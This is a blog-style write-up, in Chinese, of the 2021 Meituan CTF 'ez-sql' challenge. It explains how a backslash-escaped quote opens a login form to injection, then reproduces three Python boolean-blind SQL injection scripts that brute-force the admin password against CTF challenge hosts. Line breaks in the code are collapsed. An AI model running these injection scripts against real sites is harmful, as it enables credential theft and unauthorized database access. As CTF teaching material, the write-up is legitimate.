2021美团杯CTF ez-sql
- MySQL 正则表达式
- MySQL LIKE 子句
- Python chr() 函数
- Python ord() 函数
- string — 常见的字符串操作
- MySQL BINARY 函数
首先按照常规思路进行fuzz,发现被ban了很多东西,不过仍然保留了许多可用函数。看到 =、like 被ban自然而然能想到用 regexp 实现查询;看到单引号被ban自然而然能想到用 \ 转义单引号实现注入。首先尝试payload:username=admin\&password=||1=1%23
,回显 flag is not here! ,显然是此地无银三百两。
综上,这道题的sql语句应该是:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
当我们传入 payload 后,sql语句就变成了:
select * from users where username='admin\' and password='||1#';
由于第二个单引号被转义了,第1个单引号只能去和第3个单引号进行闭合,后台接收到的 username 就变成了admin\' and password=
这个整体,而这个用户名显然不存在,所以理应显示 ‘账号或密码错误’。但是别忘了这样以来,password 参数就成为了可控变量,1=1 显然为真,所以这里回显的不是 ‘账号或密码错误’,而是 flag is not here!
根据上述思路,我们可以编写脚本逐个字符爆破出 password,其实也就相当于布尔盲注。
下面贴几个查询到的文章和EXP:
美团CTF2021部分writeup
import requests
import time
import string
import redef ord2hex(letter):result = ''for i in letter:result += hex(ord(i))result = result.replace('0x','')return '0x'+resultdef hex2ord(letter):result = ''for i in range(0,len(letter),2):result += chr(int(letter[i:i+2], 16))return resulturl = "http://eci-2ze7rwkw5ezzl02e1ami.cloudeci1.ichunqiu.com/index.php"
str_list = string.hexdigits
flag = "^" # 使用^从头匹配
session = requests.session()
for n in range(1, 100):length = len(flag)for i in str_list:data = {'username':'admin\\',"password": "||hex(password)/**/REGEXP/**/" + ord2hex(flag + re.escape(i)) + "#"}# print(data["password"])res = session.post(url=url, data=data)res.encoding = "utf-8"time.sleep(0.1)if 'flag is not here!' in res.text:flag += iprint(flag)breakif len(flag) == length:print(hex2ord(flag.lstrip("^")))break
# username: admin
# password: This_1s_thE_Passw0rd
# @@version: 5.5.62-0ubuntu0.14.04.1
# database(): ctf
第三届美团网络安全高校挑战赛(初赛)Writeup by X1cT34m
import os
import requests as reqdef ord2hex(string):result = ''for i in string:result += hex(ord(i))result = result.replace('0x','')return '0x'+resulturl = "http://eci-2zecwo25ej0i246rbyi7.cloudeci1.ichunqiu.com/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_']
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Connection':'keep-alive'}res = ''
for i in range(50):for j in string:passwd = ord2hex('^'+res+chr(j))# print(passwd)passwd = 'or/**/password/**/regexp/**/binary/**/{}#'.format(passwd)data = {'username':"admin\\",'password':passwd}r = req.post(url, data=data, headers=headers)# print(r.text)if "flag is not here!" in r.text:res += chr(j)print(res)break
第三届美团网络安全高校挑战赛(初赛)部分writeUp
import requests
import time
def str2int(mystr):i = 0myint = 0while (i < len(mystr)):myint += ord(mystr[i]) * pow(pow(2, 8), len(mystr) - i - 1)i += 1return myint
sess = requests.Session()
url = 'http://eci-2zea89kqieujgo38pawk.cloudeci1.ichunqiu.com/index.php'
f = '账号或密码错误' # 错误时网页包含内容
y = 'flag is not here' # 正确时网页包含内容
start = 0 # 字符串的开始字符位置
strlen = 80 # 待爆破字符串的长度
sleep_time = 0
ostr = '^'
# str2find = '(database())' # CTF
# str2find = 'password' # This_1s_thE_Passw0rd
str2find = 'username'
# str2find='(select flag from flag)' # 想查询的字符串、语句;可能需要外加括号
# str2find='(select `2` from (select 1,2 union select * from user)a limit 1,1)'
for j in range(start, start+strlen):for i in range(32, 127): # 可见字符范围# for i in range(95,127):#可见字符范围if i == 46 or i == 42 or i == 43 or i == 63 or i==94: # 略过一些特殊符号($ . * ? ^等)continuetime.sleep(sleep_time)# regexp binary 0x5e61;temp_str = ostr+chr(i)ent = '{} regexp binary {}'.format(str2find, hex(str2int(temp_str))) # 待判断的事实语句payload = "||{}#".format(ent) # 注入语句# print(payload)# exit()# data数据包的构造data = {'username': '\\','password': payload.replace(' ', '/**/')}sess.get(url)res = sess.post(url, data=data)res.encoding = res.apparent_encoding # 中文编码text = res.textif f in text:continueelif y in text:ostr += chr(i)print(ostr, j)breakelse: # 即非正也非负的异常情况print('error:', text)break
print(ostr)
2021美团杯CTF ez-sql相关推荐
- 2021羊城杯CTF wp
2021羊城杯(部分)wp Web web1 only 4 web2 EasyCurl web3 Checkin_Go web4 Cross The Side Re Pwn BabyRop Cryp ...
- 2021 长城杯ctf wp
2021 长城杯 wp Misc 签到 你这flag保熟吗 Crypto baby_rsa Reverse Just_cmp funny_js Web java_url ez_python Pwn K ...
- 2021祥云杯 CTF pwn解 wp
前言:题都不难,我好气,这次被大佬带飞,队里的pwn手都是神级别的,这里出了三道题,如果我不是sha,我应该能出五道,可是我好菜,这里贴出一下 note: 思路:自己构建格式化字符串漏洞,自己打,先打 ...
- 2021网刃杯CTF ez-sql
0x00 前言 InCTF2021原题:Vuln Drive - InCTF Internationals 2021,这里直接借用其源码. <?php include('./conf.php') ...
- 2021 第二届天翼杯ctf
2021 天翼杯ctf wp Misc 签到 Browser Pwn ezshell Web eztp jackson easy_eval Tip Misc 签到 群公告 FLAG flag{e7gR ...
- [网络安全提高篇] 一〇九.津门杯CTF的Web Write-Up万字详解(SSRF、文件上传、SQL注入、代码审计、中国蚁剑)
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步.这篇文章主要介绍5月9日参加津门杯CTF题目知识,包括power_cut.hate_ ...
- [ctf misc][wp]一些内存取证的wp(含[2021蓝帽杯北部赛区分区赛]博人的文件)
wp 1.[V&N2020 公开赛]内存取证 1.找策略 volatility.exe -f C:\Users\shen\Downloads\mem.raw imageinfo 2.看进程 v ...
- 零宽字符隐写——2021网刃杯CTF 签到
0x01 零宽字符 零宽度字符是一些不可见的,不可打印的字符.它们存在于页面中主要用于调整字符的显示格式,下面就是一些常见的零宽度字符及它们的unicode码和原本用途: 零宽度空格符 (zero-w ...
- “百度杯”CTF比赛 十一月场Look
最近一直在刷百度杯的题目,感觉每个题目都能涉及到很多知识点,写点wp记录一下 进入后看见页面空白,这个时候一般用dirsearch扫一下,同时burp抓包看一下 看到响应头里有X-HT,这应该是一个提 ...
最新文章
- 基于R语言的时间序列分析预测
- Android programming on Mac 之安装Eclipse
- Makefile的介绍与使用
- 【原创】基于NIOS II的ADS1256 SPI驱动
- css 动态rem_HTML + CSS 为何得不到编程界的认可?
- 基于vue2.0的一个豆瓣电影App
- Java链表——创建链表对象
- 关于汉王 唐人笔手写板 打开后间歇性手写程序闪退以及屏幕锁屏或者关闭后手写板自动usb拔出问题
- python cad模块_Python cad包_程序模块 - PyPI - Python中文网
- 在线教育如何应对流量洪峰?阿里云专家给出了“上云+云数据库”的答案!
- RISC-V MCU+病房系统
- 在 Nebula K8s 集群中使用 nebula-spark-connector 和 nebula-algorithm
- Visual Basic
- excel导入时手机号码格式错误的一个解决方法
- 季羡林基金会与孔明在线联手弘扬国学文化
- centos使用yum时提示Segmentation fault错误的深入研究
- PX4从放弃到精通(二十七):固定翼姿态控制
- 计算机课听课评议,一堂信息技术公开课点评
- 开发板和电脑网线连接,电脑网线连接 ubuntu18.04 nfs搭建
- C++实验题8 数组使用(bushi)